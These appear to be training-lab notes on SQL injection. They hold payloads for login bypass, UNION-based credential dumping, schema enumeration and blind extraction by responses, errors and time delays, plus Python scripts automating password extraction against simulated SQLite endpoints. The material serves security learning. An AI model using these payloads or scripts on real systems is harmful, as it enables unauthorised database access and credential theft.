1.Retrieval of hidden data ---- Modify the category parameter, giving it the value '+OR+1=1-- (the whole catalogue becomes visible, including unreleased products)
2.Login bypass ---- username administrator'-- (the comment discards the rest of the query, so the password check is never evaluated); URL-encoded: administrator%27--
3.Determining the number of columns returned by the query: 'UNION+SELECT+NULL,NULL-- (add one NULL at a time until the error disappears)
'UNION+SELECT+NULL,NULL+FROM+DUAL-- (Oracle: every SELECT needs a FROM clause)
'+UNION+SELECT+username,+password+FROM+users--
4.Retrieving multiple values in a single column: username||'~'||password+FROM+users-- (~ is an arbitrary separator the attacker adds so username and password can be told apart in the output)
- 'UNION+SELECT+null,banner+FROM+v$version--  or  'UNION+SELECT+banner,null+FROM+v$version-- (put the string in whichever column accepts text)
Database version
Oracle: SELECT banner FROM v$version ; SELECT version FROM v$instance
Microsoft: SELECT @@version
PostgreSQL: SELECT version()
MySQL: SELECT @@version
- Comment syntax (everything after it is ignored)
Oracle: --
Microsoft: --
PostgreSQL: --
MySQL: # or -- (the dash form needs a trailing space)
7.Listing the database contents on non-Oracle databases
'UNION+SELECT+table_name,null+FROM+information_schema.tables--
'UNION+SELECT+column_name,null+FROM+information_schema.columns+WHERE+table_name='users_hgapfx'--
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx--
8.Listing the database contents on Oracle databases
'UNION+SELECT+table_name,NULL+FROM+ALL_TABLES--
'UNION+SELECT+COLUMN_NAME,NULL+FROM+ALL_TAB_COLUMNS+WHERE+table_name='USERS_QDVTGN'-- (Oracle stores unquoted identifiers in upper case, so the table name must be upper case here)
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx--
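The UNION steps in items 3, 4, 7 and 8 above, run end to end as an added example (not code from these notes or from PortSwigger): the target is a simulated vulnerable endpoint backed by an in-memory SQLite database, with a constructed products/users schema, and the function names (vulnerable_filter, find_column_count, find_text_column, dump_credentials) are assumptions for this example. SQLite is used only so the script runs offline; it has no information_schema, so the example covers column-count discovery and the `||'~'||` concatenation trick rather than the catalogue queries.

```python
import sqlite3

# Constructed sample schema and data for a toy catalogue (not the lab's database).
SCHEMA = """
CREATE TABLE products (name TEXT, description TEXT, category TEXT, released INTEGER);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO products VALUES ('Lamp', 'A desk lamp', 'Gifts', 1),
                            ('Prototype', 'Unreleased item', 'Gifts', 0);
INSERT INTO users VALUES ('administrator', 's3cr3t'), ('wiener', 'peter');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_filter(conn, category):
    """Simulated /filter?category= endpoint: the parameter is concatenated
    straight into the SQL text (deliberately vulnerable). Returns the rows,
    or None when the query fails (the real app would answer with an error page)."""
    sql = ("SELECT name, description FROM products "
           f"WHERE category = '{category}' AND released = 1")
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def find_column_count(target, max_cols=10):
    """Item 3: add NULLs to a UNION SELECT until the database stops
    complaining about a column-count mismatch."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        if target(payload) is not None:
            return n
    raise RuntimeError(f"no matching column count up to {max_cols}")


def find_text_column(target, n_cols):
    """Find a column that accepts a string literal. SQLite is dynamically
    typed, so the first probe succeeds; on a strictly typed database the
    same probe errors until it lands on a text column."""
    for i in range(n_cols):
        cols = ["NULL"] * n_cols
        cols[i] = "'a'"
        if target("' UNION SELECT " + ",".join(cols) + "--") is not None:
            return i
    raise RuntimeError("no column accepts a string")


def dump_credentials(target, n_cols, text_col, sep="~"):
    """Item 4: pack username and password into the one usable column with an
    attacker-chosen separator, then split the rows that contain it."""
    cols = ["NULL"] * n_cols
    cols[text_col] = f"username||'{sep}'||password"
    payload = "' UNION SELECT " + ",".join(cols) + " FROM users--"
    creds = {}
    for row in target(payload):
        cell = row[text_col]
        if isinstance(cell, str) and sep in cell:
            user, pw = cell.split(sep, 1)
            creds[user] = pw
    return creds


if __name__ == "__main__":
    conn = make_db()
    target = lambda p: vulnerable_filter(conn, p)
    print(target("' OR 1=1--"))  # item 1: both products, released or not
    n = find_column_count(target)
    c = find_text_column(target, n)
    print(dump_credentials(target, n, c))
```

The `--` terminator works here because SQLite, like PostgreSQL and Oracle, treats `--` as a line comment; against MySQL the payloads would need `-- ` with a trailing space or `#` instead.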
9.Lab: Blind SQL injection with conditional responses
'AND(SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>n)='a'--
'AND(SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>n)='a (same test without a comment: the application's own closing quote completes the query)
Increase n until the "Welcome back" message disappears; that n is the number of characters in the password.
'AND (SELECT substring(password,1,1) FROM users WHERE username='administrator')='a (then test each position against each candidate character)
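The conditional-response extraction in item 9, automated as an added example (not the lab's code): a simulated TrackingId cookie check backed by an in-memory SQLite database stands in for the vulnerable application, the schema and the password value are constructed, and the helper names (vulnerable_tracking, condition_holds, find_password_length, find_char, extract_password) are assumptions. It goes a step beyond the notes by binary-searching each character with `>` comparisons instead of trying every character, which cuts the request count roughly from 36 to 6 per position. SQLite spells the function `substr`, where PostgreSQL accepts `substring`.

```python
import sqlite3
import string

# Constructed sample data: one known tracking id and a target password.
SCHEMA = """
CREATE TABLE tracking (id TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO tracking VALUES ('xyz123');
INSERT INTO users VALUES ('administrator', 'q7m2zz1p'), ('wiener', 'peter');
"""

# Sorted in byte order so that the > comparisons below bisect correctly.
CHARSET = sorted(string.digits + string.ascii_lowercase)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_tracking(conn, cookie):
    """Simulated cookie check (deliberately vulnerable): the cookie value is
    concatenated into the query, and the page differs only by a greeting."""
    sql = f"SELECT 1 FROM tracking WHERE id = '{cookie}'"
    try:
        return "Welcome back!" if conn.execute(sql).fetchone() else "Hello"
    except sqlite3.Error:
        return "Hello"  # a query error also loses the greeting


def condition_holds(oracle, cookie, condition):
    """One yes/no question. The subquery yields 'a' only when `condition` is
    true for the administrator row, so ='a' is true or NULL; the application's
    own closing quote finishes the statement, hence no comment marker."""
    payload = (f"{cookie}' AND (SELECT 'a' FROM users WHERE "
               f"username='administrator' AND {condition})='a")
    return "Welcome back" in oracle(payload)


def find_password_length(oracle, cookie, max_len=64):
    """LENGTH(password)>n stops holding exactly when n equals the length."""
    for n in range(1, max_len + 1):
        if not condition_holds(oracle, cookie, f"LENGTH(password)>{n}"):
            return n
    raise RuntimeError(f"password longer than {max_len}")


def find_char(oracle, cookie, pos):
    """Bisect CHARSET with substr(password,pos,1) > 'c' questions, then
    confirm with an equality test so a character outside CHARSET is noticed."""
    lo, hi = 0, len(CHARSET) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if condition_holds(oracle, cookie,
                           f"substr(password,{pos},1)>'{CHARSET[mid]}'"):
            lo = mid + 1
        else:
            hi = mid
    guess = CHARSET[lo]
    if not condition_holds(oracle, cookie, f"substr(password,{pos},1)='{guess}'"):
        raise RuntimeError(f"character at position {pos} is outside CHARSET")
    return guess


def extract_password(oracle, cookie):
    length = find_password_length(oracle, cookie)
    return "".join(find_char(oracle, cookie, i) for i in range(1, length + 1))


if __name__ == "__main__":
    conn = make_db()
    oracle = lambda c: vulnerable_tracking(conn, c)
    print(extract_password(oracle, "xyz123"))
```

Against a real target, `oracle` would be a function that sends the cookie in an HTTP request and returns the response body; the rest of the script is unchanged. The equality check at the end of find_char is the safeguard a practitioner wants: without it, a password containing an uppercase letter or a symbol would silently come back as the nearest character in CHARSET.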
10.Blind SQL injection with time delays
Oracle: dbms_pipe.receive_message(('a'),10)
Microsoft: WAITFOR DELAY '0:0:10'
PostgreSQL: SELECT pg_sleep(10)
MySQL: SELECT SLEEP(10)
'||pg_sleep(10)--
11.Blind SQL injection with conditional errors
'||+(select+case+when+substr(password,1,1)='a'+then+TO_CHAR(1/0)+ELSE+''+END+from+users+where+username='administrator')+||' (Oracle: 1/0 raises a division-by-zero error only when the guessed character is right, so the error page itself is the signal)
12.Lab: Blind SQL injection with time delays and information retrieval
'||pg_sleep(10)||'--
'||(select case when (username='administrator' and substring(password,1,1)='a') then pg_sleep(10) else pg_sleep(5) end from users)-- (a 10-second response means the guess is right; measure the delay rather than the page content)